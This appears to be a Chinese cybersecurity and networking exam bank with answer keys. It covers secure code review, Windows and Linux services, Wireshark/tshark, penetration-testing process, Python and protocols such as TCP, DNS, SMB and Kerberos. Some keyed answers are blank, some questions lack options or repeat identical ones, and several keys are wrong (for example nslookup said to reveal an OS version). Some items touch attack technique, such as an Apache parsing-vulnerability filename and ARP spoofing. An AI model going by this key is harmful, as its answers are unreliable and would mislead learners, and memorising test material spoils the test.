26、常见的安全需求主要包括:身份认证,会话管理,访问控制,权限管理,数据保护,安全审计,异常处理。()

A、 对

B、 错

您的答案: 标准答案: B

27、访问控制有两个方面:限制用户对资源的访问,资源请求数量限制。对IP进行控制,采用统一的访问控制机制,在服务器端实现访问控制。()

A、 对

B、 错

您的答案: 标准答案: A

28、对于源代码审计安全缺陷,不是外部输入风险的是():

A、 终端输入数据

B、 第三方来源的数据

C、 拒绝服务的防御

D、 数据库中的数据

您的答案: 标准答案: C

29、源代码审计配置文件说法错误的是():

A、 已知恶意的数据拉入黑名单,白名单只允许少数机器访问

B、 账号长度避免使用弱口令,限制输入次数错误的登录

C、 记录日志安全不需要开启服务

D、 执行化配置文件存储了开发的信息,弱口令,连接地址,通讯方式等

您的答案: 标准答案: C

30、下面代码是动态构造的,不是典型的动态sql注入。():

A、 对

B、 错

您的答案: 标准答案: B

31、下面代码中,使用指针p之前没有检查p是否为空,不造成安全隐患。()

A、 对

B、 错

您的答案: 标准答案: B

32、下面代码中,判断指针p是否为NULL,判断前调用log函数没使用p,NULL指针引用没问题。()

A、 对

B、 错

您的答案: 标准答案: B

33、关于Windows2003版本说法正确的是():

A、 Windows2003标准版有Web版本的所有功能

B、 Windows2003标准版增加了Metadirectory Services Support、集群、热添加(Hot-Add)内存、终端服务会话目录等功能,还增加一个支持64位计算版本

C、 Windows2003 Web版有全部版本的所有功能

D、 Windows2003企业版支持高达8-32路处理器,64G内存,8节点的集群,增加了一个数据中心程序包

您的答案: 标准答案: A

34、下面添加或删除Windwos程序正确说法是():

A、 添加/删除Windows组件可以安装第三方网络服务

B、 Windows网络服务每一个对应的软件在系统里面不是一个组件

C、 添加/删除Windows组件可以添加终端服务组件

D、 更改或删除程序里可以删除安装程序和Windows组件

您的答案: 标准答案: C

35、连接到Internet和连接到工作区,连接错误是():

A、 连接到Internet,用拨号调制解调器连接

B、 连接到我的工作场所创建VPN网络,虚拟专用网络连接

C、 连接到Internet,用要求用户名和密码的宽带连接来连接

D、 连接到我的工作场所创建VPN网络,直接拨号连接

您的答案: 标准答案: D

36、本地连接Internet(TCP/IP)属性设置错误是():

A、 DHCP自动对局域网所有用户计算机分配IP地址

B、 设置静态IP,DNS不填写,可以连接到网络

C、 默认网关参数不设置,不能连接网络

D、 子网掩码默认自动获取

您的答案: 标准答案: B

37、本地系统账户和域用户账户的区别说法错误的是():

A、 本地系统账户是本机建立的用户账户,域账户是域服务器上由管理员分配给你的账户

B、 域账户是域控制器上创建的账户,所有域账户都不属于domain users组

C、 域管理员帐号属于domain admins组,具有管理域控制器的权限

D、 本地账户可以登录到域上,并获得访问该网络的权限

您的答案: 标准答案: B

38、使用Administrator对计算机或配置进行管理正确的是():

A、 本地Administrator账户可以更名,也可以删除

B、 Administrator账户不能完全控制整台计算机

C、 在执行管理任务时使用普通用户,执行非管理用户是使用Administrator管理员

D、 Administrator账户可以创建修改用户账户和组,管理安全策略,创建打印机,分配允许用户访问资源的权限等

您的答案: 标准答案: D

39、对于内置组账户和创建新组账户说法错误是():

A、 创建新组账户是在本地安全设置里用户权限分配设置

B、 内置组账户具有完全控制、从网络访问计算机、调整进程的内存配额、允许本地登录、指派等权限

C、 系统内置默认的组账户都不能删除

D、 创建新组用户有内置用户组的所有权限

您的答案: 标准答案: D

40、下面对NTFS文件系统功能说法错误的是():

A、 可以设置权限

B、 磁盘映射访问

C、 文件加密

D、 磁盘配额

您的答案: 标准答案: B

41、文件夹和文件权限定义说法错误的是():

A、 文件夹权限:完全控制,可以执行所有操作

B、 文件权限:完全控制,特别的权限

C、 文件权限:修改,读取,运行,写入

D、 文件夹权限:与文件和文件夹的数据有关,与安全选项卡读取、更改无关

您的答案: 标准答案: D

42、NTFS文件系统相对于FAT和FAT32文件系统来说,对文件资源保护,文件资源的安全性存在风险。()

A、 对

B、 错

您的答案: 标准答案: B

43、复制操作:不同NTFS分区和同NTFS分区都继承目的地权限。()

A、 对

B、 错

您的答案: 标准答案: A

44、移动操作:同NTFS分区移动不保留原有权限,不同NTFS分区移动则继承目的地权限。()

A、 对

B、 错

您的答案: 标准答案: B

45、DHCP服务器中的设置数据全部存放在名为dhcp.mdb数据库文件中,该文件位于Windows\ SysWOW64\dhcp文件夹内。()

A、 对

B、 错

您的答案: 标准答案: B

46、DHCP服务器和DHCP客户端处于不同的广播域,如何解决?()

A、 解除三层设备

B、 转发广播报文

C、 关闭广播中继

D、 开启DHCP中继功能

您的答案: 标准答案: D

47、在大型网络中,每台终端的地址都是有不同的使用来分配,出现地址相同,不会发生冲突。()

A、 对

B、 错

您的答案: 标准答案: B

48、如果要解析一个网站IP,在本地连接“设置DNS服务器地址”域到查询请求的IP,置顶向下解析正确的是():

A、 本地域名服务器,查缓存、本地数据库,二级域名服务器,顶级域名服务器,根域名服务器,返回结果

B、 根域名服务器,二级域名服务器,顶级域名服务器,返回结果

C、 查缓存、本地数据库,根域名服务器,顶级域名服务器,二级域名服务器,返回结果

D、 本地域名服务器,根域名服务器,顶级域名服务器,二级域名服务器,返回结果

您的答案: 标准答案: D

49、对DNS的数据文件说法错误的是():

A、 区域的数据都是存储在DNS服务器内的区域文件内

B、 区域文件和缓存文件存储在“%systemroot%\SysWOW64\dns”

C、 缓存文件存储着根域内的DNS服务器名称与IP地址的对照数据

D、 区域文件名为zonename.dns,缓存文件名为cacheddns

您的答案: 标准答案: B

50、在ftp传输过程中,为了定位ftp传输开始的数据包位置,筛选器的命令应该是

A、 ftp.request.command==

B、 ftp.request.command==

C、 ftp.request.command==

D、 ftp.request.command ==

您的答案: 标准答案: C

1、wireshark哪个功能可以提取传输文件

A、 flow graph

B、 throughput graph

C、 follow tcp stream

D、 udp multicast streams

您的答案: 标准答案: C

2、wireshark通信流量图可以提供ftp通信的快速视图

A、 对

B、 错

您的答案: 标准答案: A

3、在wireshark所抓数据包分析里,客户端出现响应延迟的标志是

A、 初始握手SYN,ACK包time值较高

B、 初始握手后的GET包time值较高

C、 初始握手后的ACK包time值较高

您的答案: 标准答案: B

4、在wireshark所抓数据包分析里,SYN响应包是ACK

A、 对

B、 错

您的答案: 标准答案: B

5、在wireshark所抓数据包分析里,拆除SSL连接的数据包是哪个

A、 FIN,ACK

B、 SYN,ACK

C、 ACK

D、 SYN

您的答案: 标准答案: A

6、处于同一网络内可以拦截https明文传输内容

A、 对

B、 错

您的答案: 标准答案: B

7、在wireshark中若捕获了30个DNS数据包,则说明捕获的数据包中存在有多少个DNS相关事务

A、 30个

B、 15个

C、 10个

您的答案: 标准答案: B

8、通过wireshark哪个功能可以查看http请求的所有域名的统计信息

A、 statistics的conversations功能

B、 statistics的collectd功能

C、 statistics的http功能

您的答案: 标准答案: C

9、可以通过statistics的conversations查看会话及连接的统计详情,这种说法对吗

A、 对

B、 错

您的答案: 标准答案: A

10、目标服务器端口关闭时,扫描器会

A、 没有收到数据包

B、 收到RST数据包

C、 收到SYN/ACK数据包

D、 收到FIN/ACK数据包

您的答案: 标准答案: B

11、筛选端口号为443的所有数据包时过滤器的语句是tcp.dstport==443

A、 对

B、 错

您的答案: 标准答案: B

12、扫描windows系统时收到的TTL是

A、 64

B、 128

C、 255

您的答案: 标准答案: B

13、nmap可以进行主动扫描

A、 对

B、 错

您的答案: 标准答案: A

14、ARP攻击成功后的标志是

A、 HTTP包中远程地址不变,MAC地址变为攻击者地址

B、 HTTP包中MAC地址不变,远程地址变为攻击者地址

C、 HTTP包中MAC地址和远程地址均变成攻击者的地址

您的答案: 标准答案: A

15、攻击者的ARP包中目标MAC地址指向被攻击的MAC地址

A、 对

B、 错

您的答案: 标准答案: A

16、通过wireshark哪个功能可以查找快速特定字符串

A、 Filter

B、 Find Packet

C、 Follow TCP Stream

您的答案: 标准答案: B

17、JPG文件头的十六进制码是

A、 47 49

B、 FF D8

C、 89 50

您的答案: 标准答案: B

18、在wireshark中使用IO Graphs可以查看会话流,这种说法对吗

A、 对

B、 错

您的答案: 标准答案: A

19、手机中广泛使用的协议是

A、 DNS

B、 TCP

C、 UDP

您的答案: 标准答案: C

20、在wireshark捕获的数据包中,通过哪些字段可以获得浏览器及系统版本相关信息

A、 Host

B、 Accept-Language

C、 Cookie

D、 User-Agent

您的答案: 标准答案: D

21、wireshark过滤器中输入dns可以显示所有dns相关的数据包

A、 对

B、 错

您的答案: 标准答案: A

22、apache核心配置文件是

A、 /etc/http/conf/http.conf

B、 /etc/httpd/conf/http.conf

C、 /etc/http/conf/httpd.conf

D、 /etc/httpd/conf/httpd.conf

您的答案: 标准答案: D

23、apache配置文件中的代表的是

A、 系统根目录

B、 用户根目录

C、 网站根目录

D、 配置目录

您的答案: 标准答案: C

24、网站默认页可以在apache文件中的哪个标签中设置

A、 AccessFileName

B、 Files

C、 Directory

D、 DirectoryIndex

您的答案: 标准答案: D

25、若需要设置访问认证,则应该在哪个文件中配置

A、 index.html

B、 .htaccess

C、 http.conf

您的答案: 标准答案: B

26、检查apache是否安装的命令是rpm -q httpd

A、 对

B、 错

您的答案: 标准答案: A

27、在ftp配置中,若要允许匿名用户登陆则应如何配置

A、 guest_enable=YES

B、 local_enable=YES

C、 anonymous_enable=YES

您的答案: 标准答案: C

28、检查apache是否安装的命令是rpm -q vsftp

A、 对

B、 错

您的答案: 标准答案: B

29、Sendmail服务器的配置文件是

A、 /etc/mail/sendmail.mc

B、 /etc/mail/sendmail.conf

C、 /etc/sendmail/sendmail.mc

D、 /etc/sendmail/sendmail.conf

您的答案: 标准答案: A

30、Sendmail的access文件中代表返回错误信息的是

A、 OK

B、 REJECT

C、 DISCARD

D、 RELAY

您的答案: 标准答案: B

31、Sendmail的别名功能不能进行转发

A、 对

B、 错

您的答案: 标准答案: B

32、jQuery在哪个版本以下存在公开的XSS漏洞?( )

A、 1.5

B、 1.6

C、 1.7

D、 1.8

您的答案: 标准答案: C

33、目录浏览漏洞是由于哪项配置不当引起的?( )

A、 Web服务权限

B、 数据库配置

C、 服务器端口

D、 输入输出过滤

您的答案: 标准答案: A

34、下列哪项不属于移动端应用安全防护措施?()

A、 加壳

B、 代码混淆

C、 完整性验证

D、 WAF

您的答案: 标准答案: D

35、下列哪项不属于移动应用安全检测分析中对数据安全性的检测?()

A、 数据输入

B、 输入存储

C、 数据复制数据输出

D、 MAC地址

您的答案: 标准答案: C

36、使用Apktool对apk文件进行反编译,得到程序文件是什么语言?( )

A、 Java

B、 Smali

C、 C++

D、 ARM

您的答案: 标准答案: B

37、使用apktool进行回编译应该使用哪个参数?( )

A、 s

B、 b

C、 rf

D、 d

您的答案: 标准答案: B

38、要抓取移动设备HTTPS的数据包,需要在该设备上进行那种设置?

A、 安装ca证书

B、 安装Burp Suite

C、 Root

D、 修改Host

您的答案: 标准答案: A

39、渗透测试的流程中不包含以下哪些流程

A、 信息搜集

B、 渗透测试

C、 痕迹清除

D、 后门植入

您的答案: 标准答案: D

40、应用层收集的信息不包括以下哪种

A、 Web服务器指纹

B、 网站后台

C、 DNS域传送漏洞

D、 服务器提供商

您的答案: 标准答案: D

41、认证与会话部分经常出现的漏洞有哪些

A、 目录遍历

B、 文件包含

C、 XSS

D、 Session劫持

您的答案: 标准答案: D

42、以下哪款工具可以判断目标网站是否使用了WAF?( )

A、 Nmap

B、 nslookup

C、 wafw00f

D、 Ping

您的答案: 标准答案: C

43、Nslookup的作用是什么?()

A、 查询目标网站的DNS解析

B、 查看目标站点的操作系统版本

C、 对目标服务器的开放端口进行扫描

D、 爆破邮箱密码

您的答案: 标准答案: B

44、解决企业中安全事件流程繁琐踢皮球的有效方式是什么? ( )

A、 建立安全评审组

B、 成立SRC

C、 设置安全响应机制

D、 购买安全服务

您的答案: 标准答案: A

45、风险评估的目的是更好地了解风险、把握风险,并对风险作出防范措施

A、 对

B、 错

您的答案: 标准答案: A

46、利用IBM Security Appscan Standard工具扫描网站时,如果目标网站过大,可以采用哪种方式提高效率?( )

A、 正则表达式

B、 环境定义

C、 自动表单填充

D、 多步骤操作

您的答案: 标准答案: A

47、风险评估过程中,通过相关工具发现网站漏洞后,接下来应该就进行的操作是什么?( )

A、 上传后门

B、 总结并上报

C、 置之不理

D、 帮忙修复

您的答案: 标准答案: B

48、纳入企业安全体系中的工作流程有哪些?( )

A、 代码上线

B、 安全意识培养

C、 绩效管理

D、 产品设计

您的答案: 标准答案:

49、防御文件包含漏洞的方法不包括()

A、 避免外界指定文件名

B、 拒绝上传文件

C、 文件名中不可包含目录名

D、 限定文件名中仅包含字母与数字

您的答案: 标准答案: B

50、Linux中,mod_security安装成功后,安装在下面哪个文件夹中?()

A、 /var/mod_security

B、 /apache

C、 /etc/init.d

D、 /home/user

您的答案: 标准答案: B

1、Linux环境搭建中,如果出现IPV4地址与DVWA不吻合,需要在编辑哪个文件()?

A、 /etc/hosts

B、 /etc/file

C、 /var/www/dvwa

D、 /etc/address

您的答案: 标准答案: A

2、如果部署于计算机的有WAF经常出现误报的现象,有哪些有效的解决方法?( )

A、 注销规则

B、 修改阈值

C、 检测服务器

D、 对规则进行过滤

您的答案: 标准答案: B

3、Snort中匹配到sqlmap关键字,但实际并没有遭受攻击,原因是有可能是什么?( )

A、 系统自我修复

B、 攻击者无法注入

C、 规则不严谨

D、 攻击者未攻击成功

您的答案: 标准答案: C

4、snort规则代码中每修改一次,版本号要增加1,表示版本号的是()

A、 msg

B、 content

C、 sid

D、 rev

您的答案: 标准答案: D

5、对攻击者入侵调查取证原则不包括()

A、 找到事件本质

B、 多尝试

C、 逆向思考

D、 搜集攻击者信息

您的答案: 标准答案: D

6、当发现攻击者进行SQL注入攻击时被拦截并获取其IP地址时,应当如何处理?()

A、 追踪攻击者的痕迹

B、 备份并查看日志,保存证据

C、 不当回事

D、 直接告诫攻击者

您的答案: 标准答案: B

7、Python通过哪个模块对正则表达式提供支持?( )

A、 re

B、 time

C、 sys

D、 thread

您的答案: 标准答案: A

8、Python正则表达式模块,使用“\D”来匹配什么内容?( )

A、 字母

B、 非字母

C、 数字

D、 非数字

您的答案: 标准答案: D

9、Python正则表达式模块,使用“{m}”的匹配什么内容?( )

A、 匹配前一个字符m次

B、 匹配后一个字符m次

C、 匹配长度为m的单词

D、 匹配长度为m的数字

您的答案: 标准答案: A

10、使用贪婪模式“ab*”来匹配“abbbcba”得到的结果是?( )

A、 ab

B、 abbb

C、 abbbcb

D、 abbbc

您的答案: 标准答案: B

11、若想匹配出“<div class="coursename"> title="ThisClass" onclick …… </div>”中的课程名称ThisClass,使用下列哪个正则表达式可以做到?( )

A、 <div class="classname"title=".*?onclick">

B、 <div class="classname"title="(.*?)onclick">

C、 div class=“coursename”> title="(.*?)" onclick …… ”

D、 <div class="(.?)"title=.?</div>

您的答案: 标准答案: C

12、Python中若是用ulrlib库请求指定URL页面的内容,应该使用哪个函数?( )

A、 urlopen()

B、 add_header

C、 fileopen()

D、 sleep()

您的答案: 标准答案: A

13、Python中安装第三方库应该使用什么命令?( )

A、 pip install

B、 apt-get install

C、 brew cask install

D、 yum

您的答案: 标准答案: A

14、Python的request库中,是用什么方式查看返回的HTTP状态码?( )

A、 requests.statuscode

B、 requests.responsecode

C、 requests.header

D、 requests.cookie

您的答案: 标准答案: A

15、假如在编写爬虫时,目标网站进行了防爬处理,应该在代码中添加什么内容?( )

A、 将抓取的内容解密

B、 设置请求的header

C、 设置请求的cookie

D、 更换请求类型

您的答案: 标准答案: B

16、以下关于进程和线程的描述错误的是?

A、 每个进程都有自己的内存地址空间和数据栈

B、 一个进程至少有一个线程

C、 线程能够独立执行

D、 同一个进程的多线程,可以共享内容空间

您的答案: 标准答案: C

17、Python中可以使用threading模块进行多线程程序的编写,一个新的线程的开启应当使用哪个函数?

A、 t.join()

B、 t.start_new_thread()

C、 t.append()

D、 t.sleep()

您的答案: 标准答案: B

18、在Python多线程程序中引入Queue模块可以解决什么问题?()

A、 生产参数和计算结果时间不确定的问题

B、 Thread模块不能分布式编程的问题

C、 Thread模块性能不足的问题

D、 多线程操作变量混乱的问题

您的答案: 标准答案: C

19、在不考虑硬件环境的前提下,Python中Queue的长度可以是无限的。

A、 对

B、 错

您的答案: 标准答案: A

20、Queue模块有多重队列产生模式,其默认的队列模式是什么?( )

A、 FIFO

B、 LIFO

C、 FEFO

D、 LEFO

您的答案: 标准答案: A

21、C/S架构中,C和S分别代表什么?( )

A、 Client和Sever

B、 Computer和Signal

C、 Computer和Socket

D、 Client与Socket

您的答案: 标准答案: A

22、网络化的应用程序在开始仁和通讯之前都必须创建套接字。

A、 对

B、 错

您的答案: 标准答案: A

23、Python中的Socket模块里,用于发送UDP数据的是什么函数?( )

A、 s.send()

B、 s.recv()

C、 s.sendall()

D、 s.sendto()

您的答案: 标准答案: D

24、在Python没有DB API之前,通过什么方式对数据库进行操作?( )

A、 数据库GUI接口

B、 数据库接口程序

C、 SQLmap

D、 PHPMyAdmin

您的答案: 标准答案: B

25、如何建立Python客户端与MySQL数据库的网络连接?( )

A、 MySQLdb.Connect

B、 Cursor.execute()

C、 Connection.cursor

D、 Connection.close

您的答案: 标准答案: A

26、Python数据库编程中如何执行一条数据库查询指令?( )

A、 execute(op[,args])

B、 fetchone()

C、 fetchall()

D、 rowcount

您的答案: 标准答案: A

27、以下哪个选项的内容可以创建一个FSO对象(IIS内置组件),用于操作磁盘文件?()

A、 set fso=server.createobject(“scripting.filesystemobject”)

B、 set fso=server.createobject(“scripting.filesystem”)

C、 set fso=request.createobject(“scripting.filesystemobject”)

D、 set fso=request.createobject(“scripting.fileobject”)

您的答案: 标准答案: A

28、Windows下执行cmd命令"copy 1.txt \.\c:\aux.txt",生成的aux.txt要如何删除呢?()

A、 del c:\aux.txt

B、 del aux.txt

C、 del \.\c:\aux.txt

D、 del .\c:\aux.txt

您的答案: 标准答案: C

29、通过IIS内置组件FSO对象的哪个方法可以创建一个文件操作对象?()

A、 createtextfile

B、 createbufferfile

C、 gettextfile

D、 getbufferfile

您的答案: 标准答案: A

30、IIS无法禁止用户下载以mdb为尾缀的文件。

A、 对

B、 错

您的答案: 标准答案: B

31、PHP中哪个函数可以创建一个新文件?()

A、 fopen

B、 fwrite

C、 fclose

D、 fgetfile

您的答案: 标准答案: A

32、PHP函数isset()的功能是什么?()

A、 检测变量是否为空

B、 检测变量是否为数字

C、 检测变量是否设置值

D、 检测变量是否为字符串

您的答案: 标准答案: C

33、以下哪个PHP的伪协议可以接收POST数据?()

A、 php://input

B、 php://fd

C、 php://filter

D、 php://temp

您的答案: 标准答案: A

34、以下哪种文件名称可以利用Apache的解析漏洞来运行脚本?()

A、 test.jpg.html

B、 test.php.xxx

C、 test.jpg.xxx

D、 test.html.xxx

您的答案: 标准答案: B

35、存在解析漏洞的Apache会将test.html.x1.x2.x3文件识别为html文件。

A、 对

B、 错

您的答案: 标准答案: A

36、网络安全防护体系在战略方面应该以什么为核心?()

A、 技术

B、 人

C、 设备

D、 网络

您的答案: 标准答案: B

37、网络安全防护体系在战术方面应该以什么为手段?()

A、 技术

B、 攻防

C、 情报

D、 设备

您的答案: 标准答案: C

38、网络安全威胁情报的八个核心要素不包括以下哪个选项?()

A、 被攻击系统

B、 设备

C、 动机

D、 威胁源

您的答案: 标准答案: B

39、缩短攻击者的自由攻击时间成为了安全事件应急响应的关键。

A、 对

B、 错

您的答案: 标准答案: A

40、以下哪个选项的标准不属于网络安全威胁情报?()

A、 TAXII

B、 Cybox

C、 TCIA

D、 STIX

您的答案: 标准答案: C

41、威胁情报进行信息共享过程中要注意信息的隐私问题。

A、 对

B、 错

您的答案: 标准答案: A

42、Wireshark命令行下查看文件概述信息的命令是()

A、 test2pcap

B、 capinfos

C、 rawshark

D、 tshark

您的答案: 标准答案: B

43、使用tshark从数据包筛选出指定IP地址的数据包文件命令是()

A、 tshark -r x.pcapng -Z “ip.addr==192.168.0.1” -w x2.pcapng

B、 tshark -r x.pcapng -V “ip.addr==192.168.0.1” -w x2.pcapng

C、 tshark -r x.pcapng -Y “ip.addr==192.168.0.1” -w x2.pcapng

您的答案: 标准答案: C

44、使用tshark查看数据包的TCP会话信息的命令()

A、 tshark -n -q -r x.pcap -z “conv.tcp”

B、 tshark -n -q -r x.pcap -z “smb.srt”

C、 tshark -n -q -r x.pcap -z “smb.srt”

您的答案: 标准答案: A

45、Wireshark环境下,使用Editcap x.pcapng output.pcapng -i 4命令的作用是()

A、 文件包切分成4个文件

B、 每四秒为间隔切分成一个文件

C、 每四分钟为间隔切分成一个文件

您的答案: 标准答案: B

46、使用tshark -n -q -r x.pcap -z “smb.srt”命令可以获取cifs协议响应时间的统计数据

A、 对

B、 错

您的答案: 标准答案: A

47、IP地址位于IOS七层模型的哪一层()

A、 会话层

B、 网络层

C、 数据链路层

D、 传输层

您的答案: 标准答案: B

48、Mac地址位于IOS七层模型的哪一层()

A、 会话层

B、 网络层

C、 数据链路层

D、 传输层

您的答案: 标准答案: C

49、ARP协议的作用是()

A、 将端口号映射到IP地址

B、 连接IP层和TCP层

C、 广播IP地址

D、 将IP地址映射到第二层地址

您的答案: 标准答案: D

50、ARP协议的解析过程用了几种数据包()

A、 2

B、 3

C、 4

您的答案: 标准答案: A

1、使用哪条命令查看本地的缓存列表()

A、 arp -d

B、 arp -a

C、 arp -s

D、 arp -N

您的答案: 标准答案: B

2、免费ARP报文携带的发送端地址和目标地址都是本机IP地址

A、 对

B、 错

您的答案: 标准答案: A

3、ICMP是什么协议()

A、 动态主机设置协议

B、 Internet控制报文协议

C、 超文本传输协议

D、 超文本传输协议

您的答案: 标准答案: B

4、假设TTL的初始值为3,两台主机之间存在4个路由器,则该数据包到达目的地后的TTL的值为()

A、 1

B、 2

C、 3

D、 数据包无法到达

您的答案: 标准答案: D

5、在IP数据包里,如果一个数据流被分割成了三片,则最后一个数据包的More fragments的值为()

B、 1

C、 2

D、 4

您的答案: 标准答案: A

6、以下哪个端口可以由操作系统临时使用()

A、 143

B、 80

C、 443

D、 1433

您的答案: 标准答案: D

7、在正常的TCP握手数据包中,如果第一次握手的seq=1,则第三次握手的seq值应该是()

您的答案: 标准答案: C

8、在TCP的断开流程中,第三次会发出()标志位的TCP数据包。

A、 FIN

B、 ACK

C、 FIN/ACK

D、 WIND

您的答案: 标准答案: C

9、TCP数据包里的出现什么标志位表示连接被异常终止,或被拒绝的异常请求()

A、 FIN/ACK

B、 ACK

C、 SYN

D、 RST/ACK

您的答案: 标准答案: D

10、如果一个TCP的数据包的Len=0,则以下说法正确的是()

A、 这是一个无意义的数据包

B、 并不能说明什么

C、 网络传输出现了故障

D、 这是一个错误的数据包

您的答案: 标准答案: B

11、TCP提供有序的数据传输依靠什么序列号来排序()

A、 SEQ

B、 FIN

C、 ACK

D、 SYN

您的答案: 标准答案: A

12、第二个TCP数据包的Seq值等于第一个数据包的Seq值加上()

A、 win

B、 Len

C、 ACK

D、 SEQ

您的答案: 标准答案: B

13、在TCP数据交互里,什么决定是否有必要进行数据包重传的一个主要机制()

A、 WIND

B、 RTO

C、 LEN

D、 TTL

您的答案: 标准答案: B

14、Windows系统默认的TCP Retransmission的次数为()

A、 3

B、 4

C、 5

D、 6

您的答案: 标准答案: C

15、在TCP协议包里,如果接收方发现丢包的情况,则会发送()个重复ACK数据包

A、 3

B、 4

C、 5

D、 6

您的答案: 标准答案: A

16、在TCP协议包里,如果SACK后面的值为100-200,则说明()

A、 100之前的数据已收到

B、 100至200的数据未收到

C、 100至200的数据已收到

D、 200之后的数据已收到

您的答案: 标准答案: C

17、ICMP数据包的最大尺寸为()

A、 16K

B、 32K

C、 64K

D、 128K

您的答案: 标准答案: C

18、哪个命令用于识别一个设备到另一个设备的网络路径()

A、 ping

B、 tracert

C、 nslookup

D、 net send

您的答案: 标准答案: B

19、tracert命令进行路由跟踪时,TTL值初始为()

您的答案: 标准答案: B

20、使用tracert时,如果遇到第一个路由器,数据包就被丢弃,则()

A、 数据包不再发送

B、 重新发送相同的数据包

C、 将TTL值增1之后再发送

D、 以上无正确答案

您的答案: 标准答案: B

21、DHCP协议属于IOS哪一层协议()

A、 会话层

B、 网络层

C、 数据链路层

D、 应用层

您的答案: 标准答案: D

22、以下哪个选项不属于DHCP的工作过程()

A、 DHCP Discover

B、 DHCP offer

C、 DHCP Request

D、 DHCP Listen

您的答案: 标准答案: D

23、在DHCP协议Discover包中,客户端IP地址为()

A、 0.0.0.0

B、 255.255.255.255

C、 网关IP

D、 无法确定

您的答案: 标准答案: A

24、在Wireshark下筛选DHCP协议的数据包的关键字是()

A、 bootp

B、 udp

C、 bootparams

D、 tcp

您的答案: 标准答案: A

25、在进行DNS解析的过程中,客户计算机会首先在本地的()文件中查找主机名称所对应的IP地址

A、 svchost

B、 config.ini

C、 hosts

D、 taskmgr

您的答案: 标准答案: C

26、DNS区域传送使用什么数据包()

A、 HTTP

B、 BOOTP

C、 DHCP

D、 TCP

您的答案: 标准答案: D

27、DNS解析的两种查询方式()

A、 反向查询

B、 迭代查询

C、 循环查询

D、 递归查询

您的答案: 标准答案:

28、DNS的作用是完成域名和IP地址相互转换的工作

A、 对

B、 错

您的答案: 标准答案: A

29、DNS服务使用的端口号是()

A、 443

B、 53

C、 23

D、 25

您的答案: 标准答案: B

30、当HTTP连接成功完成后,则最后一个数据包里面的状态码为()

A、 200

B、 403

C、 404

D、 500

您的答案: 标准答案: A

31、HTTP 302状态消息表示?()

A、 所请求的页面已经转移至新的url

B、 所请求的页面已经临时转移至新的url

C、 对被请求页面的访问被禁止

D、 所请求的页面可在别的url下被找到

您的答案: 标准答案: B

32、Wireshark工具下,使用哪条命令筛选出HTTP请求包()

A、 http.request.line

B、 http.request.method

C、 http.request.version

D、 http.request.method==GET

您的答案: 标准答案: D

33、Https服务使用的端口号是()

A、 23

B、 25

C、 53

D、 443

您的答案: 标准答案: D

34、以下哪项一般不会使用SSL协议进行数据传输()

A、 QQ邮箱登录

B、 网银登录

C、 论坛登陆

D、 网上支付

您的答案: 标准答案: C

35、在SSL握手的过程中,紧接着Server Hello的过程是()

A、 Client Hello

B、 Client Key Exchange

C、 Application Data

D、 Certificate

您的答案: 标准答案: D

36、FTP进行数据传输所使用的默认端口为()

A、 20

B、 21

C、 24

D、 23

您的答案: 标准答案: A

37、FTP协议默认采用的不是明文账户密码传输

A、 对

B、 错

您的答案: 标准答案: B

38、FTP被动方式传输数据包的关键字是PASV

A、 对

B、 错

您的答案: 标准答案: A

39、在实际的网络应用中,Kerberos的认证结果是()

A、 单向

B、 双向

C、 不定向

D、 依据网络实际情况而定

您的答案: 标准答案: B

40、在Kerberos中,哪个拥有所有的密码()

A、 Client

B、 Server

C、 KDC

D、 无正确答案

您的答案: 标准答案: C

41、在Kerberos中,通过计算发送时间与接收回复时间的差值,可以对抗什么攻击()

A、 DDoS

B、 重放

C、 木马

D、 暴力破解

您的答案: 标准答案: B

42、以下哪个操作系统一般并不使用NFS协议()

A、 Windows

B、 Ubuntu

C、 RedHat

D、 Centos

您的答案: 标准答案: A

43、在NFS的写文件操作中,需要利用什么操作来确定是否存盘()

A、 GETPORT

B、 ACCESS

C、 WRITE

D、 COMMIT

您的答案: 标准答案: D

44、在NFS的写文件操作协议中,查看文件是否存在使用什么标识头()

A、 LOOKUP

B、 CREATE

C、 GETATTR

D、 COMMIT

您的答案: 标准答案: A

45、在NFS协议中,Portmap请求无回复,可能是防火墙导致

A、 对

B、 错

您的答案: 标准答案: A

46、在NFS协议中,MOUNT请求无回复,可能是共享目录访问控制权限导致

A、 对

B、 错

您的答案: 标准答案: A

47、在NTF协议中,用什么标识来确认用户()

A、 UID

B、 GID

C、 Name

您的答案: 标准答案: A

48、linux系统里可以使用CIFS协议

A、 对

B、 错

您的答案: 标准答案: B

49、以下哪个是Windows自己维护的文件共享协议()

A、 TCP

B、 NFS

C、 TCP

D、 SMB

您的答案: 标准答案: D

50、在SMB协议包中,Session Setup的任务是()

A、 身份验证

B、 身份确认

C、 会话结束

您的答案: 标准答案: A

1、SMB中的什么操作可以对访问权限进行检测()

A、 write

B、 read

C、 create

D、 trans

您的答案: 标准答案: C

2、在SMB协议中,create操作包括哪些动作()

A、 新建文件

B、 目录打开

C、 文件读写

您的答案: 标准答案:

3、CIFS协议在Windows 7中可以一次性发送多个连接请求

A、 对

B、 错

您的答案: 标准答案: A

4、以下哪个协议与电子邮件协议无关()

A、 HTTP

B、 IMAP

C、 POP

D、 SMTP

您的答案: 标准答案: A

5、邮件的附件内容是利用什么方式进行加密的()

A、 MD5

B、 RSA

C、 Base64

D、 DES

您的答案: 标准答案: C

6、SMTP协议包,文本内容以什么作为结束符()

A、 CR

B、 CR&LF

C、 LF

D、 ENTER

您的答案: 标准答案: B

7、SMTP协议使用的端口()

A、 21

B、 143

C、 24

D、 25

您的答案: 标准答案: D

8、在POP协议中,客户端向服务端发送什么命令请求邮件的内容()

A、 LIST

B、 RETR

C、 UIDL

D、 QUIT

您的答案: 标准答案: B

9、常用以双等号结尾的加密数据,一般采用Base64解密

A、 对

B、 错

您的答案: 标准答案: A

10、判断一个文件是不是PE文件,常用的方法是()

A、 查看文件扩展名

B、 查看文件开头位置是不是0xFFD8

C、 查找MZ以及PE标志

D、 没有特别有效的办法

您的答案: 标准答案: C

11、以下哪款工具主要用于文件的二进制修改()

A、 FFV

B、 WinHex

C、 Beyond Compare

D、 python

您的答案: 标准答案: B

12、NBNS协议是网络基本输入/输出系统协议

A、 对

B、 错

您的答案: 标准答案: A

13、在局域网内部使用什么协议可以方便地实现消息通信及资源的共享()

A、 NetBIOS

B、 DHCP

C、 ICMP

D、 DNS

您的答案: 标准答案: A

14、在以下什么数据包中,可以找到主机名称和所处的环境工作组()

A、 DNS

B、 DHCP

C、 ICMP

D、 NBNS

您的答案: 标准答案: D

15、Kali Linux使用什么来获取IPv6的地址()

A、 ARPv6

B、 DHCPv6

C、 ICMPv6

